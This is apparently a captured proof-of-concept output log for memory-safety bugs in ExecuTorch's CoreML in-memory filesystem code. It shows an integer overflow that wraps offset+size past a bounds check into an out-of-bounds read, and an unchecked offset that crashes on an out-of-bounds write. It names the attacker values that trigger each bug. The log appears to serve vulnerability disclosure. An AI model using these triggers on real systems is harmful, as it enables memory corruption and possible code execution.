File size: 1,192 Bytes
9c5b2f3
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
########################################################################
# ExecuTorch CoreML inmemoryfs — standalone PoC output (captured 2026-07-14T14:41:28Z)
# Host: Darwin arm64; compiler: Apple clang version 17.0.0 (clang-1700.6.3.2)
########################################################################

===== PoC 1: integer-overflow -> bounds-bypass -> OOB read =====
$ clang++ -std=c++17 -g -o p1 poc_range_overflow_oob_read.cpp && ./p1
[*] buffer size              = 16
[*] attacker offset          = 20
[*] attacker size            = 18446744073709551596
[*] length()=offset+size     = 0   (wrapped past SIZE_MAX)
[*] guard 'length() > size()': 0 > 16 -> PASS (bypassed!)
[!] slice() returned ptr 20 bytes past a 16-byte buffer; dereferencing:
[!] OOB read = 0x00 (should NOT reach here under ASan)
[exit: 0]

===== PoC 2: controlled-offset OOB write (crashes) =====
$ clang++ -std=c++17 -g -o p2 poc_oob_write.cpp && ./p2
[*] dst region capacity   = 4096 bytes
[*] attacker offset        = 0x200000 (2097152 bytes past the region)
[*] NO check that offset+size <= capacity; calling memcpy(dst+offset, src, 16)...
[exit: 139 — 139 = SIGSEGV, crash on the out-of-bounds write]